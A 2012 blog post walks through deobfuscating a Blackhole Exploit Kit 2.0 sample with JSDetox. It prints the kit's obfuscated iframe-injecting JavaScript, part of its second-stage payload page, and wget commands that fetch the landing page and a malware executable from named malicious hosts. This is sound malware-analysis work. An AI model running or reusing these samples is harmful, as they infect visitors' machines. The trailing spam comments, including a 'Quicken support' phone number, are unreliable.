Thursday, September 27, 2012

Analyzing the Blackhole Exploit Kit 2.0 with JSDetox

With the release of the new Blackhole Exploit Kit version, I wanted to check if JSDetox is still able to analyze it. As it turns out, the process is not much different from the last version (shown in this screencast).
I checked http://www.malwaredomainlist.com/update.php to find a current sample. Of course you should not visit those URLs with your normal browser as they contain malware - I will not "hide" those URLs here as they are publicly documented (and seem to be taken offline by now). The same applies for the tool JSDetox, you should run it in an isolated environment.

The obfuscated iframe leading to the exploit kit sounds interesting, so lets use that one:
wget -O pho.htm "basijkarmandan.danaportal.ir/pho.htm"
The downloaded file contains this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>


<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&58&&75&&119&&62&&132&&132&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

</body>
</html>
Paste the javascript code into the textbox in the "Code Analysis" tab and click "Execute":

The code tries to call "window.eval()" - click "Show Code" to see what would be executed:

Click "Send to Analyze" to view the code in the code analysis tab and click "Analyze" to see a formatted version of the code:

Downloading the content of the created iframe...
wget -O column.php "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
This file contains 29kb of data and looks like this (shortened):
<html><body><script>g="getElementById";cc="concat";ss=String.fromCharCode;gg="getAttribute";function asd(){try{(alert+"fewfbw")()}catch(adgsdg){window["e"+"v"+"a"+"l"](s);}}</script><u id="google" 
d0="+4442494b46)3d42142o3o$453j3l3q2c%3h443h3f44*254b463h42$433l3r3q22_161k1i1r1i&20161g3q3d&3p3h22162o!3o453j3l3q!2c3h443h3f)44161g3k3d&3q3g3o3h42$223i453q3f$443l3r3q1c(3f1g3e1g3d#1d4b423h44+45423q143i$453q3f443l_3r3q1c1d4b#3f1c3e1g3d#1d4d4d1g3l@432c3h3i3l@3q3h3g223i!453q3f443l#3r3q1c3e1d+4b423h4445!42" 

[snip]

d91="43#3h1c1d234d%3f3d443f3k_1c3h1d4b4d*4442494b47&3l443k1c42%3d1l1d4b43&3k3h3o3o3h(483h3f4544^3h1c423d1o$1d234d4d3f!3d443f3k1c%3h1d4b4d4d+3f3d443f3k@1c3h1d4b4d#4d3f3d443f#3k1c3h4242!3q3r1d4b4d!3g3r3f453p$3h3q441i47_423l443h1c+1b1b1d2343$3h44303l3p&3h3r45441c%3h3q3g3b42#3h3g3l423h)3f441g1q1k)1k1k1k1d23"></u><script>
a=document[g]("google");
s="";
for(i=0;;i++){
r=a[gg]("d"[cc](i));
if(r){s=s+r;}else break;
}
a=s;
k="";
a=a.replace(/[^0-9a-z]/g,k);
s="";
for(i=0;i<a.length;i+=2){
try{gbargre-0x32}catch(sdgsdg){if(020==0x10)s+=ss(parseInt(a.substr(i,2),0x1c));}
}
asd();
</script></body></html>
The last version of the Blackhole Exploit Kit I analyzed stored the obfuscated data in the text content of HTML attributes, this version uses different attributes of one single HTML element. To analyze this in JSDetox, copy the whole content of the file in the textbox in the "HTML Document" tab and click "Extract Scripts":

You are then taken to the "Code Analysis" tab where you can analyze the code (it is a decoding loop) or directly execute the script:

JSDetox logs that the code executed "document.getElementById" (to access the big HTML element containing the obfuscated code) and that it emulated that access with the imported HTML data. JSDetox then catches a call to "window.eval()" and makes it possible to view the code that would be executed (click "Show Code" and then "Send to Analyze").

Click "Reformat" to make the code readable. At the end of the code, we find this:

Downloading the file:
wget -O cee0c21.exe "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
A check on virustotal gives a detection rate of 6/43, a few ours later it was 11/43 with some major vendors still missing it:

17 comments:

  1. It seems great! Here are some discount ray ban sunglasses for you.

    ReplyDelete
  2. شركتنا من المتميزون في اعمال الاصلاح بدون هدم او تكسير من خلال شركة ركن البيت التي تقدم الكثير والكثير في عمل اللازم وتصحيح الاخطاء التي تسببها تسريبات المياه فنحن مثلا

    شركة كشف تسربات المياه بجدة تقدم خدمة لعمل الاصلاح بدون اي خراب ونقدم النصيحة للعملاء بالابتعاد عن الاعمال التي تؤدي الي هذا الخراب فتعاملك مع شركة كشف تسربات بجدة لديها الخبرة الكافية تساعدك في الحفاظ علي منزلك كما اننا نتمكن في اننا سوف نرتقي بخدمة لاننا نقوم بالعمل السليم لها كما يوجد لدينا خدمات العوازل التي تمنع التسريبات من الاسقف لكم والحوائط والخزانات من خلال شركة تسمي الاولي في مجالها لذلك نحن نقدم شركة عزل خزانات بالرياض التي تعتبر في عل الخزانات الارضية من الداخل بواسطة مواد متميزة كما نقدم لكم شركة عزل اسطح بالرياض لعمل العوازل التي تمنع جميع التسريبات في الاسقف

    ReplyDelete
  3. One of the most prominent issues the students have to deal with while writing assignments is plagiarism. Hence, they extensively use free plagiarism checker to check if there are any copied content in the paper.
    Another major reason for using plagiarism checkers is that universities do not accept plagiarized content. Plagiarism is a serious offence. Hence, if found, the students are suspended or might even lose the grades.
    Due to these limitations, it is evident that the plagiarism checking & word counter tool are not at all effective to check plagiarism. The term plagiarism is actually very broad. It is merely not coping with words. But these tools, unfortunately, detect words but not ideas. Hence, the chances of plagiarized papers remain.

    ReplyDelete
  4. I suggest everyone to choose Assignment Help Australia for getting the best guidance in their academia. The proficient experts assist as per the requirements and learning styles desired by the university.

    ReplyDelete
  5. There are many other things as well which you keep in mind before choosing it. Go through their samples before choosing any website. So, you can understand the knowledge of assignment experts. Assignment help play an important role as they are the one who writes their assignments.
    Programming help

    Java Assignment help

    ReplyDelete
  6. Thanks for sharing useful information to getting Assignment Help in correct way. If you need any information for hiring an academic writer, place your call via greatassignmenthelp and talk to expert for resolving your concerns.
    Assignment Help Online
    Online Assignment Help
    Assignment Help Online Services
    Assignment Helper
    Assignment Assistance
    Assignment Help Experts
    Online Assignment Help Services
    Assignment Writing Help

    ReplyDelete
  7. Thanks for updating the post! Your post has shared all essential information of Assignment Help very clearly. Students should opt for online assignment writing services in order to save their time. For more details regarding the best academic writing, connect with customer care services of assignmenthelpshop
    Assignment Help Online
    Online Assignment Help
    Assignment Help Online Service
    Assignment Helper
    Assignment Assistance
    Assignment Help Experts
    Online Assignment Help Services

    ReplyDelete
  8. The mt everest base camp trek is the best trekking adventure in the world. It is a best journey to Mount Everest.

    ReplyDelete
  9. Thank you for sharing valuable information. Nice post. I enjoyed reading this post.
    Paperssolution
    topacademictutors

    ReplyDelete
  10. QuickBooks error 15106 is a common error which occurs due to problems in the update program.For more information click below: QuickBooks Error 15106 | QuickBooks Is Unable to Send Your Email to Outlook | QuickBooks Error 6000 77

    ReplyDelete
  11. Wow! Thanks for sharing your ideas. Quicken is a financial managing software program needs to be installed it before making it in use. If you are a newbie and non-tech person, then few hurdles can be encountered during installation process. At that point, you should give a ring at Quicken Customer Support Numberwithout any delay. Our team of highly skilled and talented technicians will immediately lend a hand and proffer the fruitful direction so wherever you find the errors will be effectively annihilated in no time. The provided number is our 24/7 accessible toll-free number where all Quicken users arehelped without taking any charges.

    By updating Quicken anyone can get the benefit of amazing features which it offers to users. To learn the ways to update Quicken for windows simply visit Quicken support number.

    Thanks for sharing such a nice Blog.
    quicken problems
    quicken id
    quicken id help
    quicken 2016 bypass intuit id
    quicken id login
    quicken cloud sync errors

    ReplyDelete
  12. Excellent information Providing by your Article, thank you for taking the time to share with us such a nice article. Amazing insight you have on this, it's nice to find a website that details so much information about different artists. Kindly visit livewebtutors website we providing best assignment help services in Australia.
    Read more now :- My Assignment Help

    ReplyDelete
  13. Problem can crop up at anytime, whether it is your life, your surroundings or the things you are using such as software, machines, etc. But, the main thing is we have to tackle down these problems and learn from them, so that these issues will never stumble upon us again. In doing so, you can also take assistance from an expert, a friend, a family member and anyone who you know. This is the same case with Quicken. If you face any issue while using this software then you should go for Quickens’ professionals help before trying something stupid on your own. Now, you must have a question in mind that How Do I Contact Quicken By Phone. Well, Quicken has provided a Quicken Support Number
    +1-888-817-0312 by which you can easily connect with
    Quicken supportteam and resolve your issues.

    Quicken won't open
    Quicken file won't open
    Quicken won t open
    Quicken 2016 wont open
    Quicken 2015 wont open
    Quicken wont open
    quicken won't open after update
    quicken will not open
    quicken will not open after update
    quicken won't update
    Quicken Error OL-301-A
    Quicken Error OL 301 A
    quicken error cc-506
    Quicken Error CC-800
    Quicken Error OL-221-A
    quicken ol-393-a
    convert quicken to QuickBooks
    convert quicken file to quickbooks
    Quicken Error CC-502
    quicken error cc-503

    ReplyDelete
  14. A very high level post with a knowledgeable information .thanks you for giving me such a nice information. If you need any college level Assignment Help at reliable quality with better work. Kindly visit livewebtutors website we providing best assignment help services in Australia, USA, UK, UAE, and Canada etc.
    Read more now :- Nursing Assignment Help

    ReplyDelete